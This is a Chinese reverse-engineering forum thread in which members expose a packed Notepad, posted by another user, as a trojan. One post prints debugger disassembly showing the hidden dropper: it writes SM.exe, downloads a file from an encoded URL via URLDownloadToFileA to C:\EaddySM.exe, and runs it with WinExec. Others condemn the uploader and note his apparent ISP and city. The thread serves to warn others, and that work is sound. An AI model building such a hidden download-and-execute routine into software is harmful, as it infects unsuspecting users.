能力值:
( LV2,RANK:10 )
|
-
-
2 楼
这是什么意思?木马?

:(
|
能力值:
( LV6,RANK:90 )
|
-
-
3 楼
贴错地方了:D
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
没错!是楼主发的那个加壳记事本里的!
|
能力值:
( LV9,RANK:3410 )
|
-
-
5 楼
0007FF84 0100DA89 /CALL 到 CreateFileA 来自 NOTEPAD.0100DA87
0007FF88 0100DAD5 |FileName = "E:\安全工具\幕后黑手\SM.exe"
0007FF8C C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0007FF90 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0007FF94 00000000 |pSecurity = NULL
0007FF98 00000002 |Mode = CREATE_ALWAYS
0007FF9C 00000020 |Attributes = ARCHIVE
0007FFA0 00000000 \hTemplateFile = NULL
00401158 57 push edi ; SM.00404070
00401159 00EC add ah,ch
0040115B 83C4 F0 add esp,-10
0040115E B8 38114000 mov eax,SM.00401138
00401163 E8 D0FEFFFF call SM.00401038
00401168 68 A0114000 push SM.004011A0
0040116D E8 96FFFFFF call SM.00401108 ; jmp to kernel32.OutputDebugStringA
00401172 6A 00 push 0
00401174 6A 00 push 0
00401176 68 C4114000 push SM.004011C4 ; ASCII "C:\EaddySM.exe"
0040117B 68 D4114000 push SM.004011D4 ; ASCII "020K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2G2L8$3#2G2L8#2)9J5k6h3y4G2L8g2)9J5c8Y4c8@1i4K6u0r3k6X3I4S2M7$3S2Q4x3X3g2W2P5r3g2Q4x3U0k6F1j5Y4y4H3i4K6y4n7 "
00401180 6A 00 push 0
00401182 E8 79FFFFFF call SM.00401100 ; jmp to URLMON.URLDownloadToFileA
00401187 6A 00 push 0
00401189 68 C4114000 push SM.004011C4 ; ASCII "C:\EaddySM.exe"
0040118E E8 5DFFFFFF call SM.004010F0 ; jmp to kernel32.WinExec
00401193 6A 00 push 0
00401195 E8 5EFFFFFF call SM.004010F8 ; jmp to kernel32.ExitProcess
|
能力值:
( LV12,RANK:220 )
|
-
-
6 楼
|
能力值:
( LV9,RANK:3410 )
|
-
-
7 楼
|
能力值:
( LV12,RANK:650 )
|
-
-
8 楼
fly不得了!
:D
|
能力值:
(RANK:1060 )
|
-
-
9 楼
应该鞭史叁日
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
HEHE,和上次有异曲同工之妙啊。吉林省长春市网通ADSL,2000,IE6。0,不过封IP可能没什么用,因为可能是走肉鸡代理的。还是挂起来来晾一晾吧,让大家看看她的小秘密,然后暴尸街头,造众人唾骂。:D :D :D
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
鄙视放木马的
|
能力值:
( LV8,RANK:130 )
|
-
-
12 楼
以后这些注册时间不长,发贴数量很少的id都要警惕
要么是请求破解的要么是别有用心的
我有定力,我好奇心不强,我不受标题诱惑
|
能力值:
(RANK:1060 )
|
-
-
13 楼
下次换论坛抢注heXer
|
能力值:
(RANK:760 )
|
-
-
14 楼
最初由 heXer 发布 以后这些注册时间不长,发贴数量很少的id都要警惕 要么是请求破解的要么是别有用心的
我有定力,我好奇心不强,我不受标题诱惑
赞:D
|
能力值:
( LV2,RANK:10 )
|
-
-
15 楼
鄙视,呵呵。:D
|
能力值:
( LV9,RANK:170 )
|
-
-
16 楼
我闪!!!!
|
能力值:
( LV9,RANK:3410 )
|
-
-
17 楼
最初由 heXer 发布 以后这些注册时间不长,发贴数量很少的id都要警惕 要么是请求破解的要么是别有用心的
我有定力,我好奇心不强,我不受标题诱惑 看看你对VCASM壳定力有多少
哈哈
|
能力值:
( LV8,RANK:130 )
|
-
-
18 楼
最初由 forgot 发布 下次换论坛抢注heXer
那我就抢注forgot了,呵呵~:D :D :D
|
能力值:
( LV2,RANK:10 )
|
-
-
19 楼
真他妈的可恶!!!
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
最初由 fly 发布 程序运行后如果有 E:\安全工具\幕后黑手 目录 则生成SM.exe
如果没有呢?是不是会自动创建目录?不然机会不大的说,有“E:\安全工具\幕后黑手”这个目录的概率很小啊
|
能力值:
(RANK:10 )
|
-
-
21 楼
真是个好东东!!!
好用!!!
|
能力值:
( LV9,RANK:290 )
|
-
-
22 楼
最初由 forgot 发布 下次换论坛抢注heXer
那我就抢注forgot吧;) :D
|
能力值:
(RANK:350 )
|
-
-
23 楼
|
能力值:
( LV2,RANK:10 )
|
-
-
24 楼
当剑。
|
能力值:
(RANK:10 )
|
-
-
25 楼
马夫 哎 .老大 这种 垃圾 要清理
|
|
|